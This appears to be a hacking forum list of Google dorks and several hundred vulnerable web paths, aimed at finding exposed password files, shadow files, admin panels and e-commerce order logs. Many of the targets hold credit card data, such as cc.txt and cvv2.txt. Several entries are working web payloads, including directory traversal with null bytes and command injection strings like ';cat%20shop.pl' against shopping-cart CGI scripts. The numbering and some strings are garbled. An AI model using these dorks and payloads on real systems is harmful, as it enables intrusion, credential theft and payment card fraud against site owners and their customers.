1. "Index of /admin" 2. "Index of /password" 3. "Index of /mail" 4. "Index of /" +passwd 5. "Index of /" +password.txt 6. "Index of /" +.

htaccess 7. index of ftp +.mdb allinurl:/cgi-bin/ +mailto 8. administrators.pwd.index 9. authors.pwd.index 10. service.pwd.index 11. filetype:config web 12. gobal.asax index 13. allintitle: "index of/admin" 14. allintitle: "index of/root" 15. allintitle: sensitive filetype:doc 16. allintitle: restricted filetype :mail 17. allintitle: restricted filetype:doc site:gov 18. inurlasswd filetype:txt 19. inurl:admin filetype:db 20. inurl:iisadmin 21. inurl:"auth_user_file.txt " 22. inurl:"wwwroot/*." 23. top secret site:mil 24. confidential site:mil 25. allinurl: winnt/system32/ (get cmd.exe) 26. allinurl:/bash_history 27. intitle:"Index of" .sh_history 28. intitle:"Index of" .bash_history 29. intitle:"index of" passwd 30. intitle:"index of" people.lst 31. intitle:"index of" pwd.db 32. intitle:"index of" etc/shadow 33. intitle:"index of" spwd 34. intitle:"index of" master.passwd 35. intitle:"index of" htpasswd 36. intitle:"index of" members OR accounts 37. intitle:"index of" user_carts OR user_cart 38. ALTERNATIVE INPUTS=================== = 39. _vti_inf.html 40. service.pwd 41. users.pwd 42. authors.pwd 43. administrators.pwd 44. shtml.dll 45. shtml.exe 46. fpcount.exe 47. default.asp 48. showcode.asp 49. sendmail.cfm 50. getFile.cfm 51. imagemap.exe 52. test.bat 53. msadcs.dll 54. htimage.exe 55. counter.exe 56. browser.inc 57. hello.bat 58. default.aspdvwssr.dll 59. cart32.exe

60. add.exe 61. index.jsp 62. SessionServlet 63. shtml.dll 64. index.cfm 65. page.cfm 66. shtml.exe 67. web_store.cgi 68. shop.cgi 69. upload.asp 70. default.asp 71. pbserver.dll 72. phf 73. test-cgi 74. finger 75. Count.cgi 76. jj 77. php.cgi 78. php 79. nph-test-cgi 80. handler 81. webdist.cgi 82. webgais 83. websendmail 84. faxsurvey 85. htmlscript 86. perl.exe 87. wwwboard.pl 88. www-sql 89. view-source 90. campas 91. aglimpse 92. glimpse 93. man.sh 94. AT-admin.cgi 95. AT-generate.cgi 96. filemail.pl 97. maillist.pl 98. info2www 99. files.pl 100. bnbform.cgi 101. survey.cgi 102. classifieds.cgi 103. wrap 104. cgiwrap 105. edit.pl 106. perl 107. names.nsf 108. webgais 109. dumpenv.pl 110. test.cgi 111. submit.cgi 112. guestbook.cgi 113. guestbook.pl 114. cachemgr.cgi 115. responder.cgi 116. perlshop.cgi 117. query 118. w3-msql 119. plusmail

120. 121. 122. 123. 124. 125. 126. 127. 128. 129. 130. 131. 132. 133. 134. 135. 136. 137. 138. 139. 140. 141. 142. 143. 144. 145. 146. 147. 148. 149. 150. 151. 152. 153. 154. 155. 156. 157. 158. 159. 160. 161. 162. 163. 164. 165. 166. 167. 168. 169. 170. 171. 172. 173. 174. 175. 176. 177. 178. 179.

htsearch infosrch.cgi publisher ultraboard.cgi db.cgi formmail.cgi allmanage.pl ssi adpassword.txt redirect.cgi cvsweb.cgi login.jsp dbconnect.inc admin htgrep wais.pl amadmin.pl subscribe.pl news.cgi auctionweaver.pl .htpasswd acid_main.php access.log log.htm log.html log.txt logfile logfile.htm logfile.html logfile.txt logger.html stat.htm stats.htm stats.html stats.txt webaccess.htm wwwstats.html source.asp perl mailto.cgi YaBB.pl mailform.pl cached_feed.cgi global.cgi Search.pl build.cgi common.php show global.inc ad.cgi WSFTP.LOG index.html~ index.php~ index.html.bak index.php.bak print.cgi register.cgi webdriver bbs_forum.cgi mysql.class

180. 181. 182. 183. 184. 185. 186. 187. 188. 189. 190. 191. 192. 193. 194. 195. 196. 197. 198. 199. 200. 201. 202. 203. 204. 205. 206. 207. 208. 209. 210. 211. 212. 213. 214. 215. 216. 217. 218. 219. 220. 221. 222. 223. 224. 225. 226. 227. 228. 229. 230. 231. 232. 233. 234. 235. 236. 237. 238. 239.

sendmail.inc CrazyWWWBoard.cgi search.pl way-board.cgi webpage.cgi pwd.dat adcycle post-query help.cgi /robots.txt /admin.mdb /shopping.mdb /arg; /stats/styles.css /statshelp.htm /favicon.ico /stats/admin.mdb /shopdbtest.asp /cgi-bin/test.cgi /cgi-bin/test.pl /cgi-bin/env.cgi /photos/protest/styles.css [Only registered and activated users can see links. ] /cgi-bin/whereami.cgi /shopping400.mdb /cgi/test.cgi /cgi-bin/test2.pl /photos/protest/kingmarch_02.html /chevy/index.htm /cgi-bin/glocation.cgi /cgi-bin/test2.cgi /ccbill/glocation.cgi /cgi-bin/styles.css /shopping350.mdb /cgi-bin/shopper.cgi /shopadmin.asp /news_2003-02-27.htm /cgi-bin/whois.cgi /cgi-bin/calendar.pl /cgi-bin/calendar/calendar.pl /cgibin/styles.css /venem.htm /stats/www.newbauersflowers.com/stats/04-refers.htm /cgi-bin/where.pl /cgibin/shopper.cgi&TEMPLATE=ORDE R.LOG /cgibin/recon.cgi /cgibin/test.cgi /WebShop/templates/styles.css /stats/shopping350.mdb /cgi-bin/mailform.cgi /cgi-bin/recon.cgi /chevy /cgi-bin/servinfo.cgi /acart2_0.mdb /cgi-bin/where.cgi /chevy/ /stats/www.savethemall.net/stats/19-refers.htm /ccbill/secure/ccbill.log /cgi/recon.cgi /stats/www.gregoryflynn.com/chevy

240. 241. 242. 243. 244. 245. 246. 247. 248. 249. 250. 251. 252. 253. 254. 255. 256. 257. 258. 259. 260. 261. 262. 263. 264. 265. 266. 267. 268. 269. 270. 271. 272. 273. 274. 275.

/ibill/glocation.cgi /ccbill/whereami.cgi /ibill/whereami.cgi /apps_trial.htm /cgi-bin/lancelot/recon.cgi /cgi-bin/DCShop/Orders/styles.css /cgi-bin/htmanage.cgi /stats/www.tysons.net/stats/05-refers.htm /cgi-bin/mastergate/add.cgi /cgi-bin/openjournal.cgi /cgi-bin/calendar/calendar_admin.pl /cgibin/ibill/count.cgi /cgi-bin/nbmember2.cgi /cgi-bin/mastergate/count.cgi /cgi-bin/mastergate/accountcreate.cgi /cgi-bin/ibill/accountcreate.cgi /cgibin/MasterGate2/count.cgi /cgi-bin/amadmin.pl /cgibin/mailform.cgi /cgibin/mastergate/count.cgi /cgibin/harvestor.cgi /cgibin/igate/count.cgi /WebShop /shopdisplaycategories.asp /cgi-bin/DCShop/Orders/orders.txt /cgi-bill/revshare/joinpage.cgi /stats/www.gregoryflynn.com/stats/19-refers.htm /cgi-local/DCShop/auth_data/styles.css /cgi-bin/add-passwd.cgi /cgi-bin/MasterGate/count.cgi /apps_shop.htm%20/comersus/database/comersus.mdb /data/verotellog.txt /epwd/ws_ftp.log /stats/www.dialacure.com/stats/16-refers.htm /cgi/MasterGate2/count.cgi /jump/rsn.tmus/skybox;sz=140x150;segment =all;resor=jackson;state=

WY;sect=home;tile=8;ord=5 7019 276. /wwii/styles.css 277. /cgi-bin/admin.mdb 278. /stats/www.gregoryflynn.com/stats/31-refers.htm 279. /cgi-bin/ibill-tools/count.cgi 280. /WebShop/templates/cc.txt 281. /cgibin/ibill/accountcreate.cgi 282. /cgi-bin/count.cgi 283. /cgi-local/DCShop/auth_data/auth_user_file.txt 284. /cgi/mastergate/count.cgi 285. /cgi-bin/EuroDebit/addusr.pl 286. /cgi-bin/dbm-passwd.cgi 287. /cgi/igate/accountcreate.cgi 288. /cgi-bin/store/Log_files/your_order.log 289. store/log_files/your_order.log 290. /cgi-bin/DCShop/Orders/orders.txt 291. /vpasp/shopdbtest.asp 292. /orders/checks.txt 293. /WebShop/logs 294. /ccbill/secure/ccbill.log 295. /scripts/cart32.exe 296. /cvv2.txt 297. /cart/shopdbtest.asp

298. /cgi-win/cart.pl 299. /shopdbtest.asp 300. /WebShop/logs/cc.txt 301. /cgi-local/cart.pl 302. /PDG_Cart/order.log 303. /config/datasources/expire.mdb 304. /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html 305. /orders/orders.txt 306. /cgis/cart.pl 307. /webcart/carts 308. /cgi-bin/cart32.exe/cart32clientlist 309. /cgi/cart.pl 310. /comersus/database/comersus.mdb 311. /WebShop/templates/cc.txt 312. /Admin_files/order.log 313. /orders/mountain.cfg 314. /cgi-sys/cart.pl 315. /scripts/cart.pl 316. /htbin/cart.pl 317. /productcart/database/EIPC.mdb 318. /shoponline/fpdb/shop.mdb 319. /config/datasources/myorder.mdb 320. /PDG_Cart/shopper.conf 321. /shopping/database/metacart.mdb 322. /bin/cart.pl 323. /cgi-bin/cart32.ini 324. /database/comersus.mdb 325. /cgi-local/medstore/loadpage.cgi?user_id=id&f ile=data/orders.txt 326. /cgi-bin/store/Admin_files/myorderlog.txt 327. /cgi-bin/orders.txt 328. /cgi-bin/store/Admin_files/your_order.log 329. /test/test.txt 330. /fpdb/shop.mdb 331. /cgibin/shop/orders/orders.txt 332. /shopadmin1.asp 333. /cgi-bin/shop.cgi 334. /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi 335. /cgi-bin/PDG_cart/card.txt 336. /shopper.cgi?preadd=action &key=PROFA&template=or der 1.log 337. /store/shopdbtest.asp 338. /log_files/your_order.log 339. /_database/expire.mdb 340. /HyperStat/stat_what.log 341. /cgibin/DCShop/auth_data/auth_user_file.txt 342. /htbin/orders/orders.txt 343. /SHOP/shopadmin.asp 344. /index.cgi?page=../admin/files/order.log 345. /vpshop/shopadmin.asp 346. /webcart/config 347. /PDG/order.txt 348. /cgi-bin/shopper.cgi 349. /orders/order.log 350. /orders/db/zzzbizorders.log.html 351. /easylog/easylog.html 352. /cgi-bin/store/Log_files/your_order.log 353. /cgi-bin/%20shopper.cgi?preadd=act ion&key=PROFA&template=sh opping 400.mdb 354. /comersus_message.asp? 355. /orders/import.txt 356. /htbin/DCShop/auth_data/auth_user_file.txt

357. /admin/html_lib.pl 358. /cgi-bin/%20shopper.cgi?preadd=act ion&key=PROFA&template=my order. txt 359. /cgi-bin/DCShop/auth_data/auth_user_file.txt 360. /cgi-bin/shop.pl/page=;cat%20shop.pl 361. /cgi-bin/shopper?search=action&key words=dhenzuser%20&templa te=ord er.log 362. /HBill/htpasswd 363. /bin/shop/auth_data/auth_user_file.txt 364. /cgi-bin/cs/shopdbtest.asp 365. /mysql/shopping.mdb 366. /Catalog/config/datasources/Products.mdb 367. /trafficlog 368. /cgi/orders/orders.txt 369. /cgi-local/PDG_Cart/shopper.conf 370. /store/cgi-bin/Admin_files/expire.mdb 371. /derbyteccgi/shopper.cgi?key=SC7021&pr eadd=action&template=orde r. log 372. /derbyteccgi/shopper.cgi?search=action &keywords=moron&templa te= o rder.log 373. /cgi-bin/mc.txt 374. /cgi-bin/mall2000.cgi 375. /cgi-win/DCShop/auth_data/auth_user_file.txt 376. /cgi-bin/shopper.cgi?search=action &keywords=root%20&temp lat e=ord er.log 377. /store/commerce.cgi 378. /scripts/shop/orders/orders.txt 379. /product/shopping350.mdb 380. /super_stats/access_logs 381. /cgi-local/orders/orders.txt 382. /cgi-bin/PDG_Cart/mc.txt 383. /cgibin/cart32.exe 384. /cgi-bin/Shopper.exe?search=action &keywords=psiber%20&te mpl ate=other/risinglogorder.log 385. /cgibin/password.txt 386. /Catalog/cart/carttrial.dat 387. /catalog/Admin/Admin.asp 388. /ecommerce/admin/user/admin.asp 389. /data/productcart/database/EIPC.mdb 390. /store/admin_files/commerce_user_lib.pl 391. /cgi-bin/store/index.cgi 392. /paynet.txt 393. /config/datasources/store/billing.mdb 394. /_database/shopping350.mdb 395. /cgi-bin/shopper.exe?search 396. /cgi/shop.pl/page=;cat%20shop.pl 397. /cgi-bin/store/Admin_files/orders.txt 398. /cgi-bin/store/commerce_user_lib.pl 399. /cgi-sys/pagelog.cgi 400. /cgi-sys/shop.pl/page=;cat%20shop.pl 401. /scripts/weblog 402. /fpdb/shopping400.mdb 403. /htbin/shop/orders/orders.txt 404. /cgi-bin/%20shopper.cgi?preadd=act ion&key=PROFA&template=my order. log 405. /cgi-bin/shopper.exe?search=action &keywords=psiber&templ ate =orde r.log 406. /mall_log_files/ 407. /cgi-bin/perlshop.cgi

408. /tienda/shopdbtest.asp 409. /cgi-bin/%20shopper.cgi?preadd=act ion&key=PROFA&template=sh opping .mdb 410. /cgi-bin/shopper.cgi?search=action &keywords=whinhall&tem pla te=or der.log 411. /WebShop/logs/ck.log 412. /fpdb/shopping300.mdb 413. /mysql/store.mdb 414. /cgi-bin/store/Admin_files/commerce_user_lib.pl 415. /config.dat 416. /order/order.log 417. /commerce_user_lib.pl 418. /Admin_files/AuthorizeNet_user_lib.pl 419. /cvv2.asp 420. /cgi-bin/cart32/CART32-order.txt 421. /wwwlog 422. /cool-logs/mlog.html 423. /cgi-bin/pass/merchant.cgi.log 424. /cgi-local/pagelog.cgi 425. /cgi-bin/pagelog.cgi 426. /cgi-bin/orders/cc.txt 427. /cgis/shop/orders/orders.txt 428. /admin/admin_conf.pl 429. /cgi-bin/pdg_cart/order.log 430. /cgi/PDG_Cart/order.log 431. /Admin_files/ccelog.txt 432. /cgi-bin/orders/mc.txt 433. /cgi/cart32.exe 434. /ecommerce/admin/admin.asp 435. /scripts/DCShop/auth_data/auth_user_file.txt 436. /Catalog/config/datasources/Expire.mdb 437. /ecommerce/admin/shopdbtest.asp 438. /mysql/mystore.mdb 439. /cgi-bin/%20shopper.cgi?preadd=act ion&key=PROFA&template=sh opping .asp 440. /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log 441. /cgi-bin/Count.cgi?df=callcard.dat 442. /logfiles/ 443. /shopping/shopping350.mdb 444. /admin/configuration.pl 445. /cgis/DCShop/auth_data/auth_user_file.txt 446. /cgis/cart32.exe 447. /cgi-bin/dcshop.cgi 448. /cgi-win/shop/auth_data/auth_user_file.txt 449. /shopping400.mdb 450. /HBill/config 451. /cgi-bin/shop/index.cgi?page=../admin/files/order.log 452. /search=action&keywords=GS D%20&template=order.log 453. /WebCart/orders.txt 454. /PDG_Cart/authorizenets.txt 455. /cgi-bin/AnyForm2 456. /~gcw/cgi-bin/Count.cgi?df=callcard.dat 457. /cgi-bin/PDG_Cart/order.log 458. /expire.mdb 459. /logger/ 460. /webcart-lite/orders/import.txt 461. /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl 462. /cgi-bin/PDG_Cart/shopper.conf 463. /cgi-bin/cart32.exe 464. /dc/orders/orders.txt

465. 466. 467. 468. 469. 470. csv 471. 472. 473. g 474. 475. 476. 477. 478. 479. 480. 481. 482. 483. 484. 485. 486. 487. 488. 489. 490. 491. 492. 493. 494. 495. 496. 497. 498. 499. 500.

/cgi-local/DCShop/orders/orders.txt /shop.pl/page=shop.cfg /cgi-local/cart32.exe /cgi-win/pagelog.cgi /cgi-win/shop/orders/orders.txt /cgibin/shopper.cgi?search=action &keywords=moron&templa te= order. /cgi-sys/DCShop/auth_data/auth_user_file.txt /cgi-bin/www-sql;;; /cgi-bin/%20shopper.cgi?preadd=act ion&key=PROFA&template=or der.lo /scripts/orders/orders.txt /cgi-local/shop.pl/shop.cfg /search=action&keywords=cw tb%20&template=expire.mdb /php/mylog.phtml /config/datasources/shopping.mdb /php-coolfile/action.php?action=edit&fi le=config.php /cgi-bin/ezmall2000/mall2000.cgi /cgi/DCShop/orders/orders.txt /cgi-local/shop.pl /cgis/DCShop/orders/orders.txt /product/shopdbtest.asp /ASP/cart/database/metacart.mdb /cgi-bin/cgi-lib.pl /cgi-bin/mailview.cgi?cmd=view&fld rname=inbox&select=1&html /search=action&keywords=cw tb%20&template=order.log /mysql/expire.mdb /scripts/shop/auth_data/auth_user_file.txt /cgi-bin/cart32/whatever-OUTPUT.txt /Shopping%20Cart/shopdbtest.asp /cgi/shop/auth_data/auth_user_file.txt /shop/shopping350.mdb /cgi-bin/store/Authorize_Net.pl /scripts/DCShop/orders/orders.txt /store/log_files/commerce_user_lib.pl /shopping/shopadmin.asp /cgi-bin/orderlog.txt /cgi-bin/webcart/webcart.cgi?CONFIG=mounta in&CHANGE=YES&NEX

TPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;; 501. /cool-logs/mylog.html 502. /cgibin/shop.pl/page=;cat%20shop.pl 503. /htbin/shop.pl/page=;cat%20shop.pl 504. /cgi-win/orders/orders.txt 505. /cgi-bin/%20shopper.cgi?preadd=act ion&key=PROFA&template=or der1.t xt 506. /SHOP/shopdbtest.asp 507. /cgi/pagelog.cgi 508. /php/mlog.phtml 509. /cgi-bin/shop/apdproducts.mdb 510. /htbin/shop/auth_data/auth_user_file.txt 511. /server%20logfile;;; 512. /database/metacart.mdb 513. /cgi-local/shop/orders/orders.txt